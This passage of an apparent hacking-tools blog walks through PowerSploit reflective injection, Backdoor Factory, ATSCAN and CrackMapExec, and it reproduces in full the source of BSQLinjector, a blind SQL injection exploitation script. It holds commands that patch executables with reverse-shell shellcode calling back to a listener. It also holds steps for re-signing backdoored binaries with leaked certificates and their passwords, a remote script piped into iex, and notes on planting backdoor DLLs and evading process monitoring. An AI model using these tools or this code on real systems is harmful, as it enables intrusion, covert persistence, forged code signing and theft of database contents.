-By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
2.) Reflectively load an EXE in to the PowerShell process.
-Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.
-Cleans up memory in the PS process once the DLL finishes executing.
-Great for running existing pentest tools which are EXE’s without triggering process monitoring alerts.
3.) Reflectively inject a DLL in to a remote process.
-Can NOT return DLL output to the user when run remotely OR locally.
-Does NOT clean up memory in the remote process if/when DLL finishes execution.
-Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
-Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.

DLL LOADING NOTES:
PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting.

For DLL Loading:
Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled “YOUR CODE GOES HERE” I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows:
wchar_t* : FuncReturnType = WString
char* : FuncReturnType = String
void : Default, don’t supply a FuncReturnType

For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don’t simply convert a string using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. The function name expected in the DLL for the prewritten FuncReturnType’s is as follows:
WString : WStringFunc
String : StringFunc
Void : VoidFunc

These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would be declared as follows:
extern “C” __declspec( dllexport ) wchar_t* WStringFunc()
If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify this script to accomodate this. You can find the code to modify in the section labeled “YOUR CODE GOES HERE”.

Installation Using PS-Get:

1. (new-object Net.WebClient).DownloadString("http://psget.net/GetPsGet.ps1") | iex
2. Set-ExecutionPolicy RemoteSigned
3. install-module PsUrl
4. install-module -ModuleUrl https://github.com/mattifestation/PowerSploit/archive/master.zip
5. Import-Module PowerSploit
6. Get-Command -Module PowerSploit
7. Done!

Download :  v3.0.0.zip | v3.0.0.tar.gz
Clone url Here | Our Post Before
Source : https://clymb3r.wordpress.com/ | https://github.com/mattifestation

Changelog v3.3.0:
+ Added PE codesiging support. You must provide your own codesigning cert. You can see full disclosure how to Add PE Code Signing to Backdoor Factory (BDF).

BDFactory-v-3-3-0
Test Run Using PE Code Signing

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependencies:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/

INSTALL:

git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Code Signing Certs Configure:

git clone git://git.code.sf.net/p/osslsigncode/osslsigncode osslsigncode
./autogen.sh
./configure
make
sudo make install

Navigate to your BDF home directory.

the-backdoor-factory git:(master) $
curl -O https://www.duosecurity.com/static/files/DellCertificates.zip
mkdir certs
unzip DellCertificates.zip -d certs

make a private key:

openssl pkcs12 -in certs/Verisign.pfx -nocerts -out certs/VerisignPrivateKey.pem
Enter Import Password: t-span
MAC verified OK
Enter PEM pass phrase: moomoo
Verifying - Enter PEM pass phrase: moomoo

Let's test everything out:

curl -O http://live.sysinternals.com/tcpview.exe # yay http

osslsigncode extract-signature -in tcpview.exe -out sig.txt

hexdump -C sig.txt

Test run:

osslsigncode -certs certs/Verisign.cer -key certs/VerisignPrivateKey.pem -n "Securitay" -in tcpview.exe -out tcpview_signed.exe -pass moomoo
osslsigncode extract-signature -in tcpview_signed.exe -out sig.txt
hexdump -C sig1.txt

Then now Open pebin.py in your favorite editor, and replace the code on line 1763(on behind self.binary.close() line 1759, save and test against your victim machine:

if self.ZERO_CERT is True:
            # cert was removed earlier 
            p = subprocess.Popen(['osslsigncode', '-certs', 'certs/Verisign.cer', '-key', \
                                  'certs/VerisignPrivateKey.pem', '-n', 'Security','-in', \
                                   self.flItms["backdoorfile"], '-out', self.flItms["backdoorfile"], '-pass', 'moomoo'])

 p.wait()

Download : the-backdoor-factory-3.3.0.zip |  the-backdoor-factory-3.3.0.tar.gz

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory | Our Post Before

NOTICE: For security professionals and researchers only.

ATSCAN is a perl script with function Dork scanner. XSS scanner. LFI scanner. Filter wordpress and Joomla sites in the server. Find Admin page. Decode / Encode MD5 + Base64.

Changelog v3.1: Correct proxy verification.

Principal MENU:
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / BASE 64
5 = ABOUT
6 = EXIT (->)

SCAN SITES OPTIONS:
[+] 1 = CHECK HTTPD VERSION
[+] 2 = XSS SCAN
[+] 3 = LFI SCAN
[+] 4 = RFI SCAN (JOOMLA)
[+] 5 = RFI SCAN (WORDPRESS)
[+] 6 = XSS + LFI
[+] 7 = FIND ADMIN PAGE
[+] 8 = BACK (<-)
[+] 9 = EXIT (->)

ATSCAN-V1.1 Script Download: ATSCAN-V3.1-master (Mirror)

git clone https://github.com/AlisamTechnology/ATSCAN-V3.1
cd ATSCAN-V1
chmod +x ATSCAN
./ATSCAN

note: Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy 
at https://github.com/AlisamTechnology/ATSCAN-V3.1/archive/master.zip & run using MinGW and rename file file ATSCAN to ATSCAN.pl

Source : https://github.com/AlisamTechnology

Changelog v-2.2 Codename: ‘codename ‘All I Want for Christmas is a bettername for this’:

+ Powersploit 3.0 support
+ Get-GPPPasswords integration
+ Bug fixes

CrackMapExec-v2-2 codename ‘All I Want for Crhistmas is a bettername for this’

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more!

The biggest improvements over the above tools are:
– Pure Python script, no external tools required
– Fully concurrent threading
– Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc…
– Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc…)
Intallation on Kali Linux, Ubuntu and all Linux Platform:

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
pip install --upgrade -r requirements.txt
python crackmapexec.py

Update:
git pull

CrackMapExec Usage

:

Kali 2.0 Installation problem with v5/drsuapi.py not found?
– Just clone repo/copy from ttps://github.com/CoreSecurity/impacket/blob/master/impacket/dcerpc/v5/ into your folder/usr/lib/python27/…./impacket/dcerpc/v5/

Download : v2.2.zip  | v2.2.tar.gz  | Our Post Before
Source: https://github.com/byt3bl33d3r

BSQLinjector uses blind method to retrieve data from SQL databases. I recommend using “–test” switch to clearly see how configured payload looks like before sending it to an application.

Blind SQL injection exploitation tool written in ruby.

Support Platform
– Windows using MinGW
– All Linux and Unix Platform

Example usage:
ruby BSQLinjector.rb –pattern=truestatement –file=/tmp/req.txt –prepend=”abcd’and’a’=’b’+union+select+’truestatement’+from+table+where+col%3d’value’+and+substr(password,” –append=”‘#” –ssl
BSQLInjector.rb Script:

#!/usr/bin/env ruby

require 'uri'
require 'net/http'
require 'net/https'

# CONFIGURE
$file = "" # file with vulnerable HTTP request
$secfile = "" # file with second request (2nd order)
$prepend = "" # most of SQL statement
$append = "" # how to end SQL statement

$proto = "http" # protocol to use - http/https
$proxy = "" # proxy host
$proxy_port = "" # proxy port

$mode = "b" # mode to use (between - b (default - this mode generates less requests), moreless - a (this mode generates less requests by comparing characters using \"<\", \">\", \"=\" characters), like - l (complete bruteforce with like), equals - e (complete bruteforce with =))
$hex = "n" # if hex should be used in comparing

$max = 1000; # maximum chars to enumerate
$search = ""; # what is the pattern to look for when query is TRUE

$comma = "n" # if comma should be URL encoded
$oh = "" # this character is used when opening string when comparing
$bracket = ")" # substring ending brackets
$case = "n" # setting case sensitivity

$verbose = "n" # verbose messaging
$test = "n" # test mode
timeout = 20 # timeout for receiving responses
alls = "n" # if all special characters should be included in enumeration

$i = 0 # main counter for characters

# set all variables
ARGV.each do |arg|
	$file = arg.split("=")[1] if arg.include?("--file=")
	$proto = "https" if arg.include?("--ssl")
	$proxy = arg.split("=")[1].split(":")[0] if arg.include?("--proxy=")
	$proxy_port = arg.split("=")[1].split(":")[1] if arg.include?("--proxy=")
	$verbose = "y" if arg.include?("--verbose")
	timeout = Integer(arg.split("=")[1]) if arg.include?("--timeout=")
	$comma = "y" if arg.include?("--comma")
	$secfile = arg.split("=")[1] if arg.include?("--2ndfile=")
	$max = arg.split("=")[1].to_i if arg.include?("--max=")
	$mode = arg.split("=")[1] if arg.include?("--mode=")
	$hex = "y" if arg.include?("--hex")
	$oh = arg.split("=")[1] if arg.include?("--schar=")
	$case = "y" if arg.include?("--case")
	$i = arg.split("=")[1].to_i - 1 if arg.include?("--start=")
	$test = "y" if arg.include?("--test")
	$bracket = arg.split("=")[1].to_i - 1 if arg.include?("--bracket=")
	alls = "y" if arg.include?("--special")

	$search = arg.split("=")[1] if arg.include?("--pattern=") && arg.count("=") == 1
	$prepend = arg.split("=")[1] if arg.include?("--prepend=") && arg.count("=") == 1
	$append = arg.split("=")[1] if arg.include?("--append=") && arg.count("=") == 1
	$search = arg.split("=")[1..-1].join("=") if arg.include?("--pattern=") && arg.count("=") > 1
	$prepend = arg.split("=")[1..-1].join("=") if arg.include?("--prepend=") && arg.count("=") > 1
	$append = arg.split("=")[1..-1].join("=") if arg.include?("--append=") && arg.count("=") > 1
end

# show main menu
if ARGV.nil? || ARGV.size < 3 || $file == "" || ($search == "" && $test == "n")
	puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
	puts "BSQLinjector uses blind method to retrieve data from SQL databases."
	puts ""
	puts "Options:"
	puts "  --file	Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)"
	puts "  --pattern	Mandatory - Pattern to look for when query is true. (--pattern=truestatement)"
	puts "  --prepend	Mandatory - Main payload. (--prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\""
	puts "  --append	How to end our payload. For example comment out rest of SQL statement. (--append=\'#)"
	puts "  --2ndfile	File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)"
	puts ""
	puts "  --mode	Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)"
	puts "  --hex		Use hex to compare instead of characters."
	puts "  --case	Case sensitivity."
	puts ""
	puts "  --ssl		Use SSL."
	puts "  --proxy	Proxy to use. (--proxy=127.0.0.1:8080)"
	puts ""
	puts "  --test	Enable test mode. Do not send request, just show full payload."
	puts "  --comma	Encode comma."
	puts "  --bracket	Add brackets to the end of substring function. --bracket=\"))\""
	puts "  --schar	Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")"
	puts "  --special	Include all special characters in enumeration."
	puts "  --start	Start enumeration from specified character. (--start=10)"
	puts "  --max		Maximum characters to enumerate. (--max=10)"
	puts "  --timeout	Timeout in waiting for responses. (--timeout=20)"
	puts "  --verbose	Show verbose messages."
	puts ""
	puts "Example usage:"
	puts "  ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl"
	puts ""
	exit(1)
else
	puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
end

# EXECUTION

# holds HTTP responses
$response = ""

# arrays for Blind exploitation
$arrs = [",", "_", "."]
if alls == "y"
	$arrs += ["+", "/", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""]
end
$arrn1 = ["0", "1", "2", "3", "4"]
$arrn2 = ["5", "6", "7", "8", "9"]
$arr1 = ["a", "b", "c"]
$arr2 = ["d", "e", "f"]
$arr3 = ["g", "h", "i"]
$arr4 = ["j", "k", "l", "m"]
$arr5 = ["n", "o", "p"]
$arr6 = ["q", "r", "s"]
$arr7 = ["t", "u", "v"]
$arr8 = ["w", "x", "y", "z"]

# for case sensitive
$arr9 = ["A", "B", "C"]
$arr10 = ["D", "E", "F"]
$arr11 = ["G", "H", "I"]
$arr12 = ["J", "K", "L", "M"]
$arr13 = ["N", "O", "P"]
$arr14 = ["Q", "R", "S"]
$arr15 = ["T", "U", "V"]
$arr16 = ["W", "X", "Y", "Z"]

$arrays = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arrn1 + $arrn2 + $arrs
$arraysc = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arr9 + $arr10 + $arr11 + $arr12 + $arr13 + $arr14 + $arr15 + $arr16 + $arrn1 + $arrn2 + $arrs

# other parameters
$result = ""

### Processing Request File ###

# Configure basic options

# set proxy
if $proxy == ""
	$proxy = nil
	$proxy_port = nil
end

if $hex == "y"
	$oh = ""
end

# get connection host and port
z = 1
loop do
	break if File.readlines($file)[z].chomp.empty?
	if File.readlines($file)[z].include?("Host: ")
		$remote = File.readlines($file)[z].split(" ")[1]
		if $proto == "http"
			$port = 80
		else
			$port = 443
		end
		if $remote.include?(":")
			$port = $remote.split(":")[1]
			$remote = $remote.split(":")[0]
		end
	end
	z = z + 1
end

# Configure main request
def configreq(chars)

	# test mode
	if $test == "y"
		puts "Payload example:"
		if $comma == "y"
			puts $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append
		else
			puts $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append
		end
		exit(1)
	end

	found = 0 # for detecting injected payload

	# check HTTP method
	if File.readlines($file)[0].include?("GET ")
		$method = "get"
	else
		$method = "post"
	end

	# get URI path
	$uri = File.readlines($file)[0].split(" ")[1]
	turi = URI.decode($uri).gsub("+", " ")
	if turi.include?("SQLINJECT")
		if $comma == "y"
			$uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
		else
			$uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
		end
		found = found + 1
	end
	
	# get headers
	i = 1
	$headers = Hash.new
	loop do
		break if File.readlines($file)[i].chomp.empty?
		if !File.readlines($file)[i].include?("Host: ")
			header = File.readlines($file)[i].chomp
			if header.include?("SQLINJECT")
				if $comma == "y"
					header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
				else
					header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
				end
				found = found + 1
			end
			if header.include?("Accept-Encoding")
			else
				$headers[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		i = i + 1
	end

	# get POST body
	i = i + 1
	$post = ""
	postfind = 0
	if $method == "post"
		loop do
			break if File.readlines($file)[i].nil?
			postline = File.readlines($file)[i]
			tline = postline.gsub("+", " ")
			if tline.include?("SQLINJECT")
				if $comma == "y"
					postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
				else
					postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append)
				end
				found = found + 1
			end
			$post += postline
			i = i + 1
		end
	end

	# update Content-Length header
	if $method == "post"
		$headers["Content-Length"] = String($post.bytesize)
	end

	# detect injection point
	if found == 0
		puts "Please specify injection point. Put \"SQLINJECT\" in place where payload should be injected."
		exit(1)
	elsif found > 1
		puts "Multiple instances of injection point found. Please specify only one injection point."
		exit(1)
	end

	# configuring request
	$request = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$request.use_ssl = true
		$request.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing Request File ###

### Configure request for 2nd order case ###
if $secfile != ""

	# check HTTP method
	if File.readlines($secfile)[0].include?("GET ")
		$secmethod = "get"
	else
		$secmethod = "post"
	end

	# get URI path
	$securi = File.readlines($secfile)[0].split(" ")[1]

	# get headers
	y = 1
	$secheaders = Hash.new
	loop do
		break if File.readlines($secfile)[y].chomp.empty?
		if !File.readlines($secfile)[y].include?("Host: ")
			header = File.readlines($secfile)[y].chomp
			if header.include?("Accept-Encoding")
			else
				$secheaders[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		y = y + 1
	end

	# get POST body
	y = y + 1
	$secpost = ""
	if $method == "post"
		loop do
			break if File.readlines($secfile)[y].nil?
			postline = File.readlines($secfile)[y]
			$secpost += postline
			y = y + 1
		end
	end

	# configuring 2nd request
	$secrequest = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$secrequest.use_ssl = true
		$secrequest.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing 2nd Request File ###

# Sending request
def sendreq()
	
	if $verbose == "y"
		puts "Sending request:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		end
	end
	
	$response = ""
	$request.start { |r|
		begin
			status = Timeout::timeout($time) {
    				if $method == "post"
					$response = r.post($uri, $post, $headers) 
				else
					$response = r.get($uri, $headers)
				end
  			}
		rescue Timeout::Error
		end
	}
end

# Sending second request
def send2ndreq()
	
	if $verbose == "y"
		puts "Sending second request:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		end
	end
	
	$response = ""
	$secrequest.start { |r|
		begin
			status = Timeout::timeout($time) {
    				if $method == "post"
					$response = r.post($securi, $secpost, $secheaders) 
				else
					$response = r.get($securi, $secheaders)
				end
  			}
		rescue Timeout::Error
		end
	}
end

until $i >= $max  do
	$i = $i + 1
	found = 0
	if ($result == "aaaaa")
        	puts "It seems like your payload gives always true condition. Try another parameter\'s value or different payload.\n";
        	break
        end

	if $mode == "e"
		if $case == "n"
			for ch in $arrays
				if $hex == "y"
					configreq("=" + "0x" + ch.unpack('H*')[0])
				else
					configreq("=" + $oh + ch)
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					$result = $result + ch
	    	                    	puts "Letter " + $i.to_s + " found: " + ch
					found = 1
	    	                    	break
				end
			end
		else
			for ch in $arraysc
				if $hex == "y"
					configreq("=" + "0x" + ch.unpack('H*')[0])
				else
					configreq("=" + $oh + ch)
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					$result = $result + ch
	    	                    	puts "Letter " + $i.to_s + " found: " + ch
					found = 1
	    	                    	break
				end
			end
		end
	elsif $mode == "l"
		if $case == "n"
			for ch in $arrays
				if ch != "%" && ch != "_"
					if $hex == "y"
						configreq("like" + " " + "0x" + ch.unpack('H*')[0])
					else
						configreq("like" + $oh + ch)
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						$result = $result + ch
		    	                    	puts "Letter " + $i.to_s + " found: " + ch
						found = 1
		    	                    	break
					end
				end
			end
		else
			for ch in $arraysc
				if ch != "%" && ch != "_"
					if $hex == "y"
						configreq("like" + " " + "0x" + ch.unpack('H*')[0])
					else
						configreq("like" + $oh + ch)
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						$result = $result + ch
		    	                    	puts "Letter " + $i.to_s + " found: " + ch
						found = 1
		    	                    	break
					end
				end
			end
		end

	elsif $mode == "b"

		# lowercase
		if $hex == "y"
			configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "z".unpack('H*')[0])
		else
			configreq("between" + $oh + "a" + $oh + "and" + $oh + "z")
		end
		sendreq()
		send2ndreq() if $secfile != ""
		$fheader = "n"
		$response.to_hash.each { |k,v|
			$fheader = "y" if k.to_s.include?($search)
			$fheader = "y" if v.to_s.include?($search)
		}
		if $response.body.include?($search) || $fheader == "y"
			if $hex == "y"
				configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "m".unpack('H*')[0])
			else
				configreq("between" + $oh + "a" + $oh + "and" + $oh + "m")
			end
			sendreq()
			send2ndreq() if $secfile != ""
			$fheader = "n"
			$response.to_hash.each { |k,v|
				$fheader = "y" if k.to_s.include?($search)
				$fheader = "y" if v.to_s.include?($search)
			}
			if $response.body.include?($search) || $fheader == "y"
				if $hex == "y"
					configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "f".unpack('H*')[0])
				else
					configreq("between" + $oh + "a" + $oh + "and" + $oh + "f")
				end
				sendreq()
				send2ndreq() if $secfile != ""
				$fheader = "n"
				$response.to_hash.each { |k,v|
					$fheader = "y" if k.to_s.include?($search)
					$fheader = "y" if v.to_s.include?($search)
				}
				if $response.body.include?($search) || $fheader == "y"
					if $hex == "y"
						configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "c".unpack('H*')[0])
					else
						configreq("between" + $oh + "a" + $oh + "and" + $oh + "c")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr1
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr2
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
				else
					if $hex == "y"
						configreq(" between" + " 0x" + "g".unpack('H*')[0] + " and " + "0x" + "i".unpack('H*')[0])
					else
						configreq("between" + $oh + "g" + $oh + "and" + $oh + "i")
					end
					sendreq()
					send2ndreq() if $secfile != ""
					$fheader = "n"
					$response.to_hash.each { |k,v|
						$fheader = "y" if k.to_s.include?($search)
						$fheader = "y" if v.to_s.include?($search)
					}
					if $response.body.include?($search) || $fheader == "y"
						for ch in $arr3
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					else
						for ch in $arr4
							if $hex == "y"
								configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0])
							else
								configreq("between" + $oh + ch + $oh + "and" + $oh + ch)
							end
							sendreq()
							send2ndreq() if $secfile != ""
							$fheader = "n"
							$response.to_hash.each { |k,v|
								$fheader = "y" if k.to_s.include?($search)
								$fheader = "y" if v.to_s.include?($search)
							}
							if $response.body.include?($search) || $fheader == "y"
								$result = $result + ch
		    	      			              	puts "Letter " + $i.to_s + " found: " + ch
								found = 1
				   	                    	break
							end
						end
					end
